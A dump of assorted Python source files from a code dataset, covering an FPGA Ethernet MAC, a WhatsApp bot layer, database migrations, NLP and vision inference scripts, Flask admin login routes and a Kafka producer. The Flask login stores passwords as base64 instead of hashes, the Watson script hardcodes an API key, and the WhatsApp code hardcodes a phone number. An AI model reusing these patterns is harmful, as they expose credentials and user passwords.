TxCNT[8 : 0]\r\n\r\n if CNT < Data_Length: #and CNT > 2:\r\n PktData.next = SendData\r\n #SendDataEn.next = 1\r\n\r\n elif CNT >= Data_Length:\r\n PktData.next = 0 #CRC\r\n #SendDataEn.next = 0\r\n\r\n if CNT >= Data_Length - 2:\r\n SendDataEn.next = 0\r\n\r\n if CNT == 0: Ram.din.next = 0\r\n if CNT == 1: Ram.din.next = ToChar(int(TxCNT[24:20]))\r\n if CNT == 2: Ram.din.next = ToChar(int(TxCNT[20:16]))\r\n if CNT == 3: Ram.din.next = ToChar(int(TxCNT[16:12]))\r\n if CNT == 4: Ram.din.next = ToChar(int(TxCNT[12:8 ]))\r\n if CNT == 5: Ram.din.next = ToChar(int(TxCNT[8 : 4]))\r\n if CNT == 6: Ram.din.next = ToChar(int(TxCNT[4 : 0]))\r\n\r\n if CNT >= 0 and CNT <= 6:\r\n Ram.we.next = 1\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n\r\n\r\n if State == TxS.CRC:\r\n SendDataEn.next = 0\r\n if CNT < Ether_CRC_LEN + 2 - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.GAP\r\n if CNT == 1:\r\n CrcEnable.next = 0\r\n if CNT == 4:\r\n TxEnReg.next = 0\r\n\r\n if State == TxS.GAP:\r\n PktData.next = 0\r\n if CNT < InterframeGap_Len - 1 + GapLength:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.IDLE\r\n TxEnd.next = 1\r\n CrcReset.next = 1\r\n\r\n\r\n StateReg.next = State\r\n if StateReg == TxS.IDLE : TxDataReg.next = 0\r\n if StateReg == TxS.ETH : TxDataReg.next = EthHeader\r\n if StateReg == TxS.ARP : TxDataReg.next = ARP_Data\r\n if StateReg == TxS.IP : TxDataReg.next = IPHeader\r\n if StateReg == TxS.UDP : TxDataReg.next = UDPHeader\r\n if StateReg == TxS.DATA : TxDataReg.next = PktData\r\n if StateReg == TxS.CRC : TxDataReg.next = 0\r\n if StateReg == TxS.GAP : TxDataReg.next = 0\r\n TxEnReg1.next = TxEnReg\r\n\r\n\r\n @always_seq(clk.posedge, reset=None)\r\n def Seq1():\r\n if State == TxS.CRC and CNT >= 2 and CNT <= 5:\r\n if CNT == 2: TxData.next = Crc[32:24]\r\n if CNT == 3: TxData.next = Crc[24:16]\r\n if CNT == 4: TxData.next = Crc[16:8]\r\n if CNT == 5: TxData.next = Crc[8:]\r\n\r\n else:\r\n TxData.next = TxDataReg\r\n TxEn.next = TxEnReg1\r\n\r\n\r\n\r\n return instances()","sub_path":"FPGA Ethernet Mac.py/Mac_Tx.py","file_name":"Mac_Tx.py","file_ext":"py","file_size_in_byte":10595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"533230015","text":"import base64\nimport datetime\nimport io\n\nfrom PIL import Image\nfrom yowsup.common.optionalmodules import PILOptionalModule\nfrom yowsup.layers.interface import YowInterfaceLayer, ProtocolEntityCallback\nfrom yowsup.layers.protocol_chatstate.protocolentities import OutgoingChatstateProtocolEntity\nfrom yowsup.layers.protocol_groups.protocolentities import ListGroupsIqProtocolEntity, LeaveGroupsIqProtocolEntity\nfrom yowsup.layers.protocol_messages.protocolentities import TextMessageProtocolEntity\nfrom yowsup.common.tools import Jid\nimport time\nfrom yowsup.layers.protocol_presence.protocolentities import AvailablePresenceProtocolEntity, \\\n UnavailablePresenceProtocolEntity\nfrom yowsup.layers.protocol_profiles.protocolentities import SetStatusIqProtocolEntity, GetPictureIqProtocolEntity, \\\n SetPictureIqProtocolEntity\nfrom yowsup.layers.protocol_receipts.protocolentities import IncomingReceiptProtocolEntity, \\\n OutgoingReceiptProtocolEntity\n\nfrom whatsapp_controller.io_messages import events\nfrom yowsup.layers.protocol_messages.protocolentities.message import MessageProtocolEntity\n\n\nclass WhatsappObserverLayer(YowInterfaceLayer):\n def send_message(self, phone, message):\n \"\"\" Send Message which Whatsapp to a number\n \n This function will send a message to a number, but will try 'humanize' the process, e.g. set online status and \n set typing status and then send the message.\n \n Args:\n phone (str): \n message (str): \n\n Returns:\n bool: True if the message was sent\n \"\"\"\n number = Jid.normalize(phone)\n\n self.set_web_status()\n time.sleep(.5)\n\n self.set_writing_status(number)\n time.sleep(.5)\n\n self.set_writing_status(number, False)\n time.sleep(.5)\n\n send_message = TextMessageProtocolEntity(message, to=number)\n\n self.toLower(send_message)\n time.sleep(.5)\n\n self.set_web_status(False)\n\n return send_message.getId()\n\n def set_web_status(self, online=True):\n if online:\n self.toLower(AvailablePresenceProtocolEntity())\n else:\n self.toLower(UnavailablePresenceProtocolEntity())\n\n def set_writing_status(self, to_number, is_writing=True):\n if is_writing:\n self.toLower(OutgoingChatstateProtocolEntity(OutgoingChatstateProtocolEntity.STATE_TYPING, to_number))\n else:\n self.toLower(OutgoingChatstateProtocolEntity(OutgoingChatstateProtocolEntity.STATE_PAUSED, to_number))\n\n @ProtocolEntityCallback(\"success\")\n def on_success_event(self, success_protocol_entity):\n # self.set_web_status(True)\n # self.contact_picture('5521986624095')\n # self.contact_picturePreview('5521986624095')\n # print(self.groups_list())\n self.send_message(\"5521986624095\", \"Apenas testando a vizualização\")\n pass\n\n def set_message_read_state(self, message_id, to_number, read=True):\n message_protocol_entity = OutgoingReceiptProtocolEntity(message_id, Jid.normalize(to_number), read=read)\n self.toLower(message_protocol_entity)\n\n @ProtocolEntityCallback(\"receipt\")\n def on_receipt_event(self, message_protocol_entity):\n message_id = message_protocol_entity.getId()\n type_status = message_protocol_entity.getType()\n date = datetime.datetime.fromtimestamp(float(message_protocol_entity.timestamp))\n\n if events.mensagem_recebida(message_id, lida=type_status, data=date, telefone=self.getOwnJid(False)):\n self.toLower(message_protocol_entity.ack())\n\n @ProtocolEntityCallback(\"message\")\n def on_message_event(self, message_protocol_entity):\n if message_protocol_entity.getType() == MessageProtocolEntity.MESSAGE_TYPE_TEXT \\\n and not message_protocol_entity.isBroadcast() and not message_protocol_entity.isGroupMessage() and \\\n self._text_message_received(message_protocol_entity):\n\n self.set_web_status()\n time.sleep(.5)\n\n self.toLower(message_protocol_entity.ack())\n time.sleep(.5)\n\n self.set_web_status(False)\n\n def _text_message_received(self, message_protocol_entity):\n message_id = message_protocol_entity.getId()\n number = message_protocol_entity.getFrom(False)\n name = message_protocol_entity.getNotify()\n text_message = message_protocol_entity.getBody()\n date_received = datetime.datetime.fromtimestamp(message_protocol_entity.getTimestamp())\n return events.save_incoming_text_message(message_id, telefone_remetente=number, nome_remetente=name,\n texto=text_message, data=date_received,\n telefone=self.getOwnJid(False))\n\n def set_status_profile(self, text):\n\n def onSuccess(resultIqEntity, originalIqEntity):\n print(\"Status updated successfully\")\n\n def onError(errorIqEntity, originalIqEntity):\n print(\"Error updating status\")\n\n entity = SetStatusIqProtocolEntity(text)\n self._sendIq(entity, onSuccess, onError)\n\n def get_contact_picture(self, jid, preview=True):\n entity = GetPictureIqProtocolEntity(Jid.normalize(jid), preview=preview)\n self._sendIq(entity, self.on_get_contact_picture_result)\n\n def on_get_contact_picture_result(self, resultGetPictureIqProtocolEntiy, getPictureIqProtocolEntity):\n # path = r\"C:\\Users\\Ruan\\Pictures\\zap\\%s_%s.png\" % (getPictureIqProtocolEntity.getTo(), \"preview\" if resultGetPictureIqProtocolEntiy.isPreview() else \"full\")\n picture = resultGetPictureIqProtocolEntiy.getPictureData().encode('ISO-8859-1')\n print(base64.b64decode(picture))\n\n # def groups_list(self):\n # entity = ListGroupsIqProtocolEntity()\n # self.toLower(entity)\n # print(entity)\n # print(entity.toProtocolTreeNode())\n # self.group_leave(entity.getTag())\n\n # @clicmd(\"Leave a group you belong to\", 4)\n # def group_leave(self, group_jid):\n # entity = LeaveGroupsIqProtocolEntity([Jid.normalize(group_jid)])\n # # self.toLower(entity)\n # print(entity)","sub_path":"old/whatsapp_controller/whatsapp_api/whatsapp_observer_layer.py","file_name":"whatsapp_observer_layer.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498367587","text":"# Licensed under the Prefect Community License, available at\n# https://www.prefect.io/legal/prefect-community-license\n\n\n\"\"\"\nAdd task run trigger\n\nRevision ID: 6c48e68b5e97\nRevises: 7ff37edbf446\nCreate Date: 2020-03-18 13:10:36.269070\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import JSONB, UUID\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6c48e68b5e97\"\ndown_revision = \"7ff37edbf446\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.execute(\n \"\"\"\n CREATE FUNCTION insert_task_runs_after_flow_run_insert() RETURNS TRIGGER AS $$\n BEGIN\n -- create task runs for each of the tasks in the new flow run's\n -- flow\n INSERT INTO task_run (flow_run_id, task_id, cache_key, map_index)\n SELECT NEW.id, task.id, task.cache_key, -1\n FROM task\n WHERE task.flow_id = NEW.flow_id;\n\n -- create corresponding states for each of the new task runs\n INSERT INTO task_run_state(task_run_id, state, message, serialized_state)\n SELECT task_run.id, 'Pending', 'Task run created', '{\"type\": \"Pending\", \"message\": \"Task run created\"}'\n FROM task_run\n WHERE task_run.flow_run_id = NEW.id;\n RETURN NEW;\n END;\n $$ LANGUAGE plpgsql;\n\n CREATE TRIGGER insert_task_runs_after_flow_run_insert\n AFTER INSERT\n ON flow_run\n FOR EACH ROW\n EXECUTE PROCEDURE insert_task_runs_after_flow_run_insert();\n \"\"\"\n )\n\n\ndef downgrade():\n op.execute(\"DROP FUNCTION insert_task_runs_after_flow_run_insert CASCADE;\")\n","sub_path":"server/services/postgres/alembic/versions/2020-03-18T131036_add_task_run_trigger.py","file_name":"2020-03-18T131036_add_task_run_trigger.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"59383356","text":"from typing import Tuple, List\nfrom overrides import overrides\n\nfrom allennlp.common.util import JsonDict, sanitize\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.models import Model\nfrom allennlp.service.predictors.predictor import Predictor\nfrom allennlp.data.tokenizers.word_splitter import SpacyWordSplitter\n\n\n@Predictor.register('constituency-parser')\nclass ConstituencyParserPredictor(Predictor):\n \"\"\"\n Wrapper for the :class:`~allennlp.models.SpanConstituencyParser` model.\n \"\"\"\n def __init__(self, model: Model, dataset_reader: DatasetReader) -> None:\n super().__init__(model, dataset_reader)\n self._tokenizer = SpacyWordSplitter(language='en_core_web_sm')\n\n @overrides\n def _json_to_instance(self, json_dict: JsonDict) -> Tuple[Instance, JsonDict]:\n \"\"\"\n Expects JSON that looks like ``{\"sentence\": \"...\"}``.\n \"\"\"\n sentence_text = [token.text for token in self._tokenizer.split_words(json_dict[\"sentence\"])]\n return self._dataset_reader.text_to_instance(sentence_text), {\"sentence\": sentence_text}\n\n @overrides\n def predict_json(self, inputs: JsonDict, cuda_device: int = -1) -> JsonDict:\n instance, return_dict = self._json_to_instance(inputs)\n outputs = self._model.forward_on_instance(instance, cuda_device)\n return_dict.update(outputs)\n\n # format the NLTK tree as a string on a single line.\n tree = return_dict.pop(\"trees\")\n return_dict[\"trees\"] = tree.pformat(margin=1000000)\n return sanitize(return_dict)\n\n @overrides\n def predict_batch_json(self, inputs: List[JsonDict], cuda_device: int = -1) -> List[JsonDict]:\n instances, return_dicts = zip(*self._batch_json_to_instances(inputs))\n outputs = self._model.forward_on_instances(instances, cuda_device)\n for output, return_dict in zip(outputs, return_dicts):\n return_dict.update(output)\n # format the NLTK tree as a string on a single line.\n tree = return_dict.pop(\"trees\")\n return_dict[\"trees\"] = tree.pformat(margin=1000000)\n return sanitize(return_dicts)\n","sub_path":"allennlp/service/predictors/constituency_parser.py","file_name":"constituency_parser.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"494397977","text":"import keras\nfrom keras_retinanet import models\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\nfrom keras_retinanet.utils.colors import label_color\nfrom keras_retinanet.utils.gpu import setup_gpu\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\nimport numpy as np\nimport time\n\n\n\ngpu = 0\n\n# set the modified tf session as backend in keras\n\nsetup_gpu(gpu)\n\n\n\nmodel_path = os.path.join('./snapshots/resnet50_csv_1000.h5')\n\n# load retinanet model\nmodel = models.load_model(model_path, backbone_name='resnet50')\n\n# if the model is not converted to an inference model, use the line below\n# see: https://github.com/fizyr/keras-retinanet#converting-a-training-model-to-inference-model\nmodel = models.convert_model(model)\n\n#print(model.summary())\n\n# load label to names mapping for visualization purposes\nlabels_to_names = {0: 'vita_500', 1: 'gas_hwal', 2: 'hongsam', 3: 'dailyC', 4: 'mango', 5: 'red_bull', 6: 'gal_bae', 7: 'tejava', 8: 'power', 9: 'peach', 10: 'sol', 11: 'grape', 12: 'pocari', 13: '2%'}\n\n\n\n\n\n# load image\nimage = read_image_bgr('./1.jpg')\noutput_path = './1_result.jpg'\n\n# copy to draw on\ndraw = image.copy()\ndraw = cv2.cvtColor(draw, cv2.COLOR_BGR2RGB)\n\n# preprocess image for network\nimage = preprocess_image(image)\nimage, scale = resize_image(image)\n\n# process image\nstart = time.time()\nboxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))\nprint(\"processing time: \", time.time() - start)\n\n# correct for image scale\nboxes /= scale\n\ndef draw_box(image, box, color, thickness=5):\n \"\"\" Draws a box on an image with a given color.\n\n # Arguments\n image : The image to draw on.\n box : A list of 4 elements (x1, y1, x2, y2).\n color : The color of the box.\n thickness : The thickness of the lines to draw a box with.\n \"\"\"\n b = np.array(box).astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), color, thickness, cv2.LINE_AA)\n\n\n\ndef draw_caption(image, box, caption):\n \"\"\" Draws a caption above the box in an image.\n\n # Arguments\n image : The image to draw on.\n box : A list of 4 elements (x1, y1, x2, y2).\n caption : String containing the text to draw.\n \"\"\"\n b = np.array(box).astype(int)\n #cv2.putText(image, caption, (b[0], b[1] - 10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 0), 2)\n cv2.putText(image, caption, (b[0], b[1] - 10), cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 255), 3)\n\n\ndef draw_boxes(image, boxes, color, thickness=2):\n \"\"\" Draws boxes on an image with a given color.\n\n # Arguments\n image : The image to draw on.\n boxes : A [N, 4] matrix (x1, y1, x2, y2).\n color : The color of the boxes.\n thickness : The thickness of the lines to draw boxes with.\n \"\"\"\n for b in boxes:\n draw_box(image, b, color, thickness=thickness)\n\n# visualize detections\nfor box, score, label in zip(boxes[0], scores[0], labels[0]):\n # scores are sorted so we can break\n if score < 0.5:\n break\n \n color = label_color(label)\n \n b = box.astype(int)\n draw_box(draw, b, color=color)\n \n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\n draw_caption(draw, b, caption)\n detected_img =cv2.cvtColor(draw, cv2.COLOR_RGB2BGR)\n cv2.imwrite(output_path, detected_img)\n \n#plt.figure(figsize=(15, 15))\n#plt.axis('off')\n#cv2.imwrite(draw)\n#plt.show()\n\n\"\"\"\ndef round_int(x):\n if x == float(\"inf\") or x == float(\"-inf\"):\n return float('nan') # or x or return whatever makes sense\n return int(round(x))\n\ndef detect(net, meta, image, model, train_num, thresh=.3, hier_thresh=.7, nms=.15):\n im = load_image(\"./test_img/%s\"%image, 0, 0)\n num = c_int(0)\n pnum = pointer(num)\n predict_image(net, im)\n dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)\n num = pnum[0]\n fontpath = '/usr/share/fonts/truetype/nanum/NanumBarunGothic.ttf'\n pont = ImageFont.truetype(fontpath, 70)\n if (nms): do_nms_obj(dets, num, meta.classes, nms);\n\n res = []\n img = cv2.imread(\"./test_img/%s\"%image)\n for j in range(num):\n for i in range(meta.classes):\n if dets[j].prob[i] > 0:\n b = dets[j].bbox\n res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))\n\n if model == \"distance\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (255, 0, 0), 3)\n elif model == \"no_distance\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (0, 255, 0), 3)\n elif model == \"nobrand\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (0, 0, 255), 3)\n elif model == \"total\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (255, 255, 255), 3)\n elif model == \"classification\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (0, 0, 255), 3)\n # cv2.putText(img, str(meta.names[i]), (int(b.x), int(b.y) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n # cv2.putText(img, dic[str(meta.names[i])], (int(b.x), int(b.y) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n # cv2.putText(img, dic[str(meta.names[i])], (int(b.x), int(b.y) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n img_pil = Image.fromarray(img)\n draw = ImageDraw.Draw(img_pil)\n bb,g,r,a = 255,255,255,0\n ff_t = str(str(meta.names[i]))\n ff_t = ff_t.decode('utf-8')\n draw.text((int(b.x-(b.w/2)), int(b.y-(b.h/2-100))), ff_t,font=pont, fill=(bb,g,r))\n print(str(meta.names[i]))\n img = np.array(img_pil)\n \n\"\"\"\n\n","sub_path":"Object-Detection/Keras-Retinanet/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"586576273","text":"from os import name\nfrom django.urls import path\nfrom .views import Create, Crud, Delete, Update, index\n\napp_name = 'app'\n\nurlpatterns = [\n path('',index,name='index'),\n path('delete_/',Delete,name='delete'),\n path('crud',Crud,name='crud'),\n path('create',Create,name='create'),\n path('update_/',Update,name='update')\n]\n","sub_path":"Crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"595383898","text":"from __future__ import print_function\nimport sys\nimport __main__\nfrom flask import Flask, render_template, redirect, Blueprint, url_for, flash, request, current_app, session\nfrom helpers import tasks\nfrom forms.admin import loginclass\nfrom flask_login import current_user, login_user\nimport flask_login\nimport base64\nfrom flask_admin import BaseView\nfrom .. import db\nfrom flask import render_template, redirect\n\nauthroutes = Blueprint('authroutes', __name__, template_folder='templates')\n\n\n\t\n@authroutes.route('/admin/login', methods=['GET','POST'])\ndef login():\n\tloginForm = loginclass.CreateLogin(prefix='frmlogin')\n\n\t#return render_template('security/login_user.html')\n\tif request.method == 'POST' :\n\t\t\n\t\tstrpassword = str(base64.encodestring(loginForm.password.data))\n\t\tif loginForm.email.data and strpassword :\n\t\t\tuser_rec = db.users.find_one({'email': str(loginForm.email.data), 'password': str(strpassword).rstrip(\"\\r\\n\"), 'active': 1, 'is_deleted': 0, 'role': 'admin'})\n\t\t\tif user_rec == None:\n\t\t\t\tflash(u'Incorrect Credentials', 'error')\n\t\t\t\treturn redirect('/admin/login')\n\t\t\telse :\n\t\t\t\tsession['logged_in'] = True\n\t\t\t\tuserid = \"\" + str(user_rec.get('_id'))\n\t\t\t\tsession['user_id'] = \"\" + userid\n\t\t\t\tsession['user_email'] = user_rec.get('email')\n\t\t\t\tsession['user_name'] = user_rec.get('firstname') + \" \" + user_rec.get('lastname')\n\t\t\t\tuser_count = db.users.find({'is_deleted': 0, 'role': 'user'}).count()\n\t\t\t\tif(user_count == None):\n\t\t\t\t\tuser_count = 0\n\t\t\t\tclassifieds_count = db.classifieds.find({'is_deleted': 0}).count()\n\t\t\t\tif(classifieds_count == None):\n\t\t\t\t\tclassifieds_count = 0\n\t\t\t\t\t\n\t\t\t\t# category count\n\t\t\t\tcategories_count = db.categories.find({'is_deleted': 0}).count()\n\t\t\t\tif(categories_count == None):\n\t\t\t\t\tcategories_count = 0\n\t\t\t\t\n\t\t\t\t# category count\n\t\t\t\tcms_page_count = db.cms_page.find({'is_deleted': 0}).count()\n\t\t\t\tif(cms_page_count == None):\n\t\t\t\t\tcms_page_count = 0\n\t\t\t\t# baaner count\n\t\t\t\thome_banners_count = db.home_banners.find({'is_deleted': 0}).count()\n\t\t\t\tif(home_banners_count == None):\n\t\t\t\t\thome_banners_count = 0\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\tflash(u'You have logged in successfully', 'success')\n\t\t\t\treturn render_template('admin/index.html',categories_count= categories_count,cms_page_count=cms_page_count,home_banners_count=home_banners_count, user_rec = user_rec, user_count = user_count, classifieds_count = classifieds_count)\n\t\t#print('params-->' + loginForm.email.data + '--' + loginForm.password.data)\n\treturn render_template('security/login_user.html',loginForm = loginForm)\n\n@authroutes.route('/admin/logout', methods=['GET'])\ndef logoutuser():\n\tflask_login.logout_user()\n\tsession['logged_in'] = False\n\tflash(u'You have logged out successfully', 'success')\n\treturn redirect('/admin/login')\n\n@authroutes.route('/admin/home', methods=['GET'])\ndef showdashboard():\n\tif not session.get('logged_in') == True:\n\t\tflash(u'Please login to continue', 'error')\n\t\treturn redirect('/admin/login')\n\tuser_count = db.users.find({'is_deleted': 0, 'role': 'user'}).count()\n\tif(user_count == None):\n\t\tuser_count = 0\n\tclassifieds_count = db.classifieds.find({'is_deleted': 0}).count()\n\tif(classifieds_count == None):\n\t\tclassifieds_count = 0\n\t# category count\n\tcategories_count = db.categories.find({'is_deleted': 0}).count()\n\tif(categories_count == None):\n\t\tcategories_count = 0\n\t\n\t# category count\n\tcms_page_count = db.cms_page.find({'is_deleted': 0}).count()\n\tif(cms_page_count == None):\n\t\tcms_page_count = 0\n\t# baaner count\n\thome_banners_count = db.home_banners.find({'is_deleted': 0}).count()\n\tif(home_banners_count == None):\n\t\thome_banners_count = 0\n\t\t\n\tif(session['logged_in']):\n\t user_rec = db.users.find_one({'email': session['user_email'], 'active': 1, 'is_deleted': 0})\n\t return render_template('admin/index.html',home_banners_count=home_banners_count,cms_page_count=cms_page_count, categories_count = categories_count,user_rec = user_rec, user_count = user_count, classifieds_count = classifieds_count)\n\telse:\n\t\tflash(u'Please login to continue', 'error')\n\t\tloginForm = loginclass.CreateLogin(prefix='frmlogin')\n\t\treturn render_template('security/login_user.html',loginForm = loginForm)\n","sub_path":"routers/admin/authroutes.py","file_name":"authroutes.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"341617607","text":"import tkinter as tk\nfrom klient import *\n\n\nclass WidokListaKlientow(tk.Frame):\n\tdef __init__(self, parent, controller):\n\t\tself.controller = controller\n\t\ttk.Frame.__init__(self, parent)\n\t\t\n\t\ttop_frame = tk.Frame(self)\n\t\tinput_wyszukaj = tk.Entry(top_frame)\n\t\tinput_wyszukaj.grid(row=0, column=0)\n\n\t\tbutton_wyszukaj = tk.Button(top_frame, text=\"Wyszukaj\")\n\t\tbutton_wyszukaj.grid(row=0, column=1)\n\n\t\tbutton_dodaj_klienta = tk.Button(top_frame, text=\"Dodaj klienta\")\n\t\tbutton_dodaj_klienta.grid(row=0, column=3)\n\n\t\tbottom_frame = tk.Frame(self)\n\t\tlabel_id = tk.Label(bottom_frame, text=\"Id\")\n\t\tlabel_id.grid(row=0, column=0)\n\n\t\tlabel_nazwa = tk.Label(bottom_frame, text=\"Nazwa klienta\")\n\t\tlabel_nazwa.grid(row=0, column=1)\n\n\t\tlabel_akcja = tk.Label(bottom_frame, text=\"Akcje\")\n\t\tlabel_akcja.grid(row=0, column=2)\n\n\n\t\tklienci = wczytaj_klientow()\n\t\tfor i in range(len(klienci)):\n\t\t\ttk.Label(bottom_frame, text=klienci[i].id).grid(row=i+1, column=0)\n\t\t\ttk.Label(bottom_frame, text=klienci[i].nazwa).grid(row=i+1, column=1)\n\t\t\ttk.Button(bottom_frame, text=\"Wyswietl profil\", command=lambda i=i: controller.wczytaj_uslugi(klienci[i].id)).grid(row=i+1, column=2)\n\n\t\ttop_frame.pack()\n\t\tbottom_frame.pack()\n","sub_path":"widok_lista_klientow.py","file_name":"widok_lista_klientow.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"550836649","text":"from math import sqrt\nfrom typing import List\n\n\ndef euclidean_distance(row1: List[float], row2: List[float]) -> float:\n \"\"\"\n Return the euclidian distance between 2 rows\n :return: the euclidian distance\n \"\"\"\n assert len(row1) == len(row2), \"Vectors do not have the same length\"\n distance = sqrt(sum([(a - b) ** 2 for a, b in zip(row1, row2)]))\n return distance\n\n\ndef get_nearest_neighbors(train_set: List[List[float]], input_row: List[float], K: int) -> List[int]:\n \"\"\"\n return the indices of the nearest neighbors\n :param train_set: list of train rows\n :param input_row: row to find the neighbors\n :param K: number of neighbors to consider\n :return: the indices of the K nearest neighbors\n \"\"\"\n train_set = [(index, train_row) for index,train_row in zip(range(len(train_set)), train_set)]\n distances = [(train_row[0], euclidean_distance(input_row, train_row[1])) for train_row in train_set]\n distances.sort(key=lambda tup: tup[1])\n neighbors_indices = [distances[i][0] for i in range(K)]\n return neighbors_indices\n\n\ndef predict(train_set: List[List[float]], labels_set: List[int], input_row: List[float], K: int) -> int:\n \"\"\"\n\n :param train_set:\n :param labels_set:\n :param input_row:\n :param K:\n :return: the predicted class of the input row\n \"\"\"\n neighbors_indices = get_nearest_neighbors(train_set, input_row, K)\n neighbors_classes = [labels_set[indice] for indice in neighbors_indices]\n predicted_class = max(set(neighbors_classes), key=neighbors_classes.count)\n return predicted_class\n\n\n\n\nprint(\"ok\")\n","sub_path":"KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"647092526","text":"import os\nimport json\nfrom ibm_watson import VisualRecognitionV4\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.visual_recognition_v4 import AnalyzeEnums, FileWithMetadata\nimport draw_json\n\nauthenticator = IAMAuthenticator('4-ejwb43zCRCOJAgo1p-l_arPHzyNG3wWihdPWzdIqjm')\nvisual_recognition = VisualRecognitionV4(\n version='2019-02-11',\n authenticator=authenticator\n)\nvisual_recognition.set_service_url(\"https://api.us-south.visual-recognition.watson.cloud.ibm.com/instances/63946c59-5e29-4323-99f1-6c1b114f4e95\")\n\ncollect_id = \"e05d041b-3181-484a-aaee-17785cf11bc2\"\n\ndef analyze_results( path):\n try:\n with open(path, 'rb') as honda_file:\n result = visual_recognition.analyze(\n collection_ids=[collect_id],\n features=[AnalyzeEnums.Features.OBJECTS.value],\n images_file=[\n FileWithMetadata(honda_file)\n ], threshold=0.25).get_result()\n print(result)\n print(type(result))\n return result\n except:\n print(path)\n return None\ndef analyzing(path):\n result = analyze_results(path)\n if result is not None:\n image_path = draw_json.drawing_json(path,result)\n return image_path","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"318794030","text":"from time import sleep\nfrom json import dumps\nfrom kafka import KafkaProducer\nimport random\nimport datetime as dt\nimport pandas\n\n\ndef readCSV():\n climate_streaming_data = pandas.read_csv('hotspot_TERRA_streaming.csv')\n streaming_data = []\n for _, row in climate_streaming_data.iterrows():\n data_point = {}\n data_point['latitude'] = float(row['latitude'])\n data_point['longitude'] = float(row['longitude'])\n data_point['confidence'] = float(row['confidence'])\n data_point['surface_temperature_celcius'] = float(\n row['surface_temperature_celcius'])\n\n streaming_data.append(data_point)\n\n return streaming_data\n\n\ndef publish_message(producer_instance, topic_name, data):\n try:\n value_bytes = bytes(data, encoding='utf-8')\n producer_instance.send(topic_name, value=value_bytes)\n producer_instance.flush()\n print('Message published successfully. Data: ' + str(data))\n except Exception as ex:\n print('Exception in publishing message.')\n print(str(ex))\n\n\ndef connect_kafka_producer():\n _producer = None\n try:\n _producer = KafkaProducer(\n bootstrap_servers=['localhost:9092'], api_version=(0, 10))\n except Exception as ex:\n print('Exception while connecting Kafka.')\n print(str(ex))\n finally:\n return _producer\n\n\nif __name__ == '__main__':\n\n data = readCSV()\n topic = 'Hotspot_TERRA'\n producer = connect_kafka_producer()\n created_date = dt.datetime(2019, 1, 1)\n\n count = 0\n\n while True:\n count += 4\n\n random_number = random.randrange(0, len(data))\n selected_data = data[random_number]\n\n if count > 16:\n created_date += dt.timedelta(days=1)\n created_date.replace(hour=0, minute=0, second=0)\n count = 0\n\n selected_data['created_time'] = created_date + dt.timedelta(\n hours=(random.randrange(count - 4, count)),\n minutes=(random.randrange(0, 60)),\n seconds=(random.randrange(0, 60)))\n # print(selected_data['created_time'].strftime(\"%m/%d/%Y, %H:%M:%S\"))\n selected_data['producer_id'] = 'producer_hotspot_terra'\n\n transport_data = str(selected_data)\n publish_message(producer, topic, transport_data)\n\n 